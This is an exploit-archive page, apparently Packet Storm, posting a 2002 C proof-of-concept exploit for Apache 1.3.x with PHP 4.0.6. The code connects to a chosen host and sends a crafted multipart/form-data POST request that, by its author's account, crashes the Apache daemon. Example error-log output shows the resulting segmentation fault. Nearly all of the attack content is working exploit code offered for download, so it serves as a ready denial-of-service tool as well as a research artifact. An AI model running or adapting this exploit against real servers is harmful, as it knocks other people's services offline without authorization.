exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

apache_php.c

apache_php.c
Posted Mar 4, 2002
Authored by Gabriel Maggiotti | Site qb0x.net

Apache 1.3.x + php 4.0.6 proof of concept exploit for the multipart/form-data POST requests bug. This exploit crashes the daemon.

tags | exploit, php, proof of concept
SHA-256 | 4897e0f6a9cd3079e9c2afb645eaaff987ec37ff48d79cea6eb16c6f1c26b858

apache_php.c

Change Mirror Download
/*
---------------------------------------------------------------------------
Web: https://qb0x.net Author: Gabriel A. Maggiotti
Date: Febrary 03, 2002 E-mail: gmaggiot@ciudad.com.ar
---------------------------------------------------------------------------

Summary
-------
This is a proof of concept exploit for Apache/1.3.x + php_4.0.6. This
code exploit multipart/form-data POST requests bug. This code only crash
apache deamon, not open any shell or execute code in the remote server.
PHP supports multipart/form-data POST requests (as described in RFC1867)
known as POST fileuploads. Unfourtunately there are several flaws in the
php_mime_split function that could be used by an attacker to execute arbi-
trary code. I dont know if the vuln I exploit is a known vuln or not.

Example:
-------

<quote>
[gabi@pluto logs]$ ./apache_php host 80 hi.php
[gabi@pluto logs]$ cat /www/logs/error_log

[Sun Mar 3 02:50:36 2002] [notice] child pid 26856 exit signal Segmentation
fault (11)

[gabi@pluto logs]$
</quote>

Greets:
------
A special greets to Fernando Oubi#a and Sebastian Brocher, good friend of
mime.

An very special greets for a good friend and an excellent Security
Consultant Alex Hernandez!!!

*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>

#define MAX 1000
#define PORT 80

char *str_replace(char *rep, char *orig, char *string)
{
int len=strlen(orig);
char buf[MAX]="";
char *pt=strstr(string,orig);

strncpy(buf,string, pt-string );
strcat(buf,rep);
strcat(buf,pt+strlen(orig));
strcpy(string,buf);
return string;
}

int main(int argc,char *argv[MAX])
{
int sockfd;
int numbytes;
int port;
char *ptr;

char POST_REQUEST[MAX] =
"POST ##file HTTP/1.0\n"
"Referer: https://host/xxxxxx/exp.php?hi_lames=haha\n"
"Connection: Keep-Alive\nContent-type: multipart/for"
"m-data; boundary=---------------------------1354088"
"10612827886801697150081\nContent-Length: 567\n\n---"
"--------------------------1354088106128278868016971"
"50081\nContent-Disposition: form-data; name=\"\x8\"";

struct hostent *he;
struct sockaddr_in their_addr;

if(argc!=4)
{
fprintf(stderr,"usage:%s <hostname> <port> <php_file>\n",argv[0]);
exit(1);
}

port=atoi(argv[2]);
ptr=str_replace(argv[3],"##file",POST_REQUEST);
//ptr=POST_REQUEST;

if((he=gethostbyname(argv[1]))==NULL)
{
perror("gethostbyname");
exit(1);
}


if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) {
perror("socket"); exit(1);
}

their_addr.sin_family=AF_INET;
their_addr.sin_port=htons(port);
their_addr.sin_addr=*((struct in_addr*)he->h_addr);
bzero(&(their_addr.sin_zero),8);

if( connect(sockfd,(struct sockaddr*)&their_addr,\
sizeof(struct sockaddr))==-1)
{
perror("connect");
exit(1);
}


if( send(sockfd,ptr,strlen(POST_REQUEST),0) ==-1)
{
perror("send");
exit(0);
}

close(sockfd);

return 0;
}

/*
---------------------------------------------------------------------------
research-list@qb0x.net is dedicated to interactively researching vulnerab-
ilities, report potential or undeveloped holes in any kind of computer system.
To subscribe to research-list@qb0x.ne t send a blank email to
research-list-subscribe@qb0x.net. More help available sending an email
to research-list-help@qb0x.net.
Note: the list doesn't allow html, it will be stripped from messages.
---------------------------------------------------------------------------
*/
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close